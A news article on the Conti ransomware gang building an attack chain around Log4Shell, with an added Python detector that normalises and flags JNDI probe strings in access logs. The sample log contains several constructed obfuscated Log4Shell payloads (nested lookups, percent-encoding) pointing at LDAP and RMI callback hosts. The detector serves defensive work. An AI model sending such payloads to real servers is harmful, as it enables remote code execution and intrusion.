Conti has become the first professional-grade, sophisticated ransomware group to weaponize the Log4j2 vulnerability, and now has a full attack chain built around it.
The Conti ransomware gang, which last week became the first professional crimeware outfit to adopt and weaponize the Log4Shell vulnerability, has now built out a complete attack chain.
The sophisticated Russia-based Conti group – which Palo Alto Networks has called “one of the most ruthless” of dozens of ransomware groups currently known to be active – was in the right place at the right time with the right tools when Log4Shell hit the scene 10 days ago, security firm Advanced Intelligence (AdvIntel) said in a report shared with Threatpost on Thursday.
As of today, Monday, Dec. 20, the attack chain has taken the following form, AdvIntel’s Yelisey Boguslavskiy told Threatpost: Emotet -> Cobalt Strike -> Human Exploitation -> (no ADMIN$ share) -> Kerberoast -> brute -> vCenter ESXi with log4shell scan for vCenter.
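The last link in that chain, a Log4Shell scan against vCenter, leaves a recognizable trace in the target's HTTP logs: a JNDI lookup string, usually wrapped in nested Log4j lookups (`${lower:j}`, `${::-j}`) or percent-encoded so that a naive `${jndi:` filter misses it. The detector below is an added example written for this article, not code from AdvIntel, Threatpost or the Conti chain itself. The access-log lines it scans are constructed (Apache-style, not real vCenter output, with IPs from documentation ranges), the function names `normalize`, `find_jndi` and `scan_log` are this example's own, and the three de-obfuscation rules are common ones rather than an exhaustive list.

```python
"""Detect Log4Shell (CVE-2021-44228) probe strings in access logs.

Added example for the article; not AdvIntel's or Threatpost's code. The log
lines are constructed and the IP addresses come from documentation ranges.
"""
from __future__ import annotations

import re
import urllib.parse
from dataclasses import dataclass

# Constructed sample: a benign visitor, one scanner trying four encodings, a second benign visitor.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Dec/2021:10:01:02 +0000] "GET /ui/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [20/Dec/2021:10:01:07 +0000] "GET /websso/SAML2/SSO/vsphere.local HTTP/1.1" 400 0 "-" "${jndi:ldap://198.51.100.7:1389/a}"
10.0.0.9 - - [20/Dec/2021:10:01:09 +0000] "GET /ui/login HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${lower:l}dap://198.51.100.7:1389/b}"
10.0.0.9 - - [20/Dec/2021:10:01:11 +0000] "GET /?x=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.7%3A1099%2Fc%7D HTTP/1.1" 200 12 "-" "curl/7.79"
10.0.0.9 - - [20/Dec/2021:10:01:13 +0000] "GET /ui/ HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.7:1389/d}"
10.0.0.12 - - [20/Dec/2021:10:02:00 +0000] "GET /ui/ HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux)"
"""

# ${lower:x} / ${upper:x} evaluate to x; letter case does not matter for detection.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
# ${name:-default} (including the degenerate ${::-x}) evaluates to its default value
# when the named lookup is undefined, which is how scanners spell out "jndi" letter by letter.
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# After normalisation every probe collapses to ${jndi:<scheme>://<host[:port]>/...
_JNDI = re.compile(r"\$\{jndi:([a-z]+):/*([^/}\s]+)")


def normalize(text: str, max_rounds: int = 10) -> str:
    """Undo percent-encoding and nested Log4j lookups, then lower-case the result."""
    # Decode repeatedly: scanners double-encode to slip past single-pass filters.
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    # Resolve innermost lookups first; nested lookups need several rounds.
    for _ in range(max_rounds):
        reduced = _CASE_LOOKUP.sub(r"\1", text)
        reduced = _DEFAULT_LOOKUP.sub(r"\1", reduced)
        if reduced == text:
            break
        text = reduced
    return text.lower()


@dataclass(frozen=True)
class Finding:
    line_no: int
    src_ip: str
    scheme: str   # ldap, rmi, dns, ...
    target: str   # host[:port] the victim JVM would connect back to


def find_jndi(line: str) -> list[tuple[str, str]]:
    """Return (scheme, target) for every JNDI lookup in one log line."""
    return _JNDI.findall(normalize(line))


def scan_log(text: str) -> list[Finding]:
    """Scan a whole access log; the source IP is the first field of each line."""
    findings: list[Finding] = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        if not raw.strip():
            continue
        src_ip = raw.split(" ", 1)[0]
        for scheme, target in find_jndi(raw):
            findings.append(Finding(line_no, src_ip, scheme, target))
    return findings


def probing_sources(findings: list[Finding]) -> dict[str, int]:
    """Count probes per source address: the first pivot a responder wants."""
    counts: dict[str, int] = {}
    for f in findings:
        counts[f.src_ip] = counts.get(f.src_ip, 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f"line {f.line_no}: {f.src_ip} -> {f.scheme}://{f.target}")
    print(probing_sources(hits))
```

Two practical notes. The callback target extracted by `find_jndi` is the useful indicator: an outbound LDAP or RMI connection from a vCenter host to that address is the difference between a scan that bounced off a patched system and one that fired. And because the normalizer only strips the lookup forms listed in its comments, treat a clean result as "no known pattern seen", not as proof the host was never probed.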
Stepping through that attack chain:
Emotet is a botnet that resurfaced last month on the back of TrickBot, now with the ability to directly install … Cobalt Strike on infected devices. Cobalt Strike is the legitimate, commercially available tool used by network penetration testers.